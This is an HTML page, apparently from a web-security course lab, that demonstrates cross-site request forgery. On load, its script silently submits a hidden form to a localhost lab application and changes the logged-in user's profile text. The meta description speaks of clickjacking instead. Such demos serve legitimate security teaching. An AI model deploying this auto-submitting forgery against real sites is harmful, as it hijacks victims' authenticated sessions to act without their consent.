<!doctype html>
<html class="no-js" lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

    <title>CSRF Demo</title>
    <meta name="description" content="Demo of using clickjacking to transfer zoobar.">
    <meta name="author" content="Feross Aboukhadijeh and Judy">

    <link rel="stylesheet" href="style.css">
    <link rel="shortcut icon" href="../img/icon.ico" />
</head>

<body>


<h1>hello, world.</h1>
<h2>修改当前登陆账户的profile为“hello world”</h2>
<iframe name="myframe1" style="display:none;"></iframe>
<script>

var f=document.createElement("form");
f.method="post";
f.id="myform";
f["target"]="myframe1";
f.action="http://localhost:8080/USTCWebSecurity/index.php";
f.style.display="none";

var i = document.createElement("textarea");
i.name="profile";
i.value="hello world!";
f.appendChild(i);

var i = document.createElement("input");
i.name="profile_submit";
i.value="保存";
f.appendChild(i);

document.getElementsByTagName("body")[0].appendChild(f);
document.forms["myform"].submit();



</script>

</body>
</html>


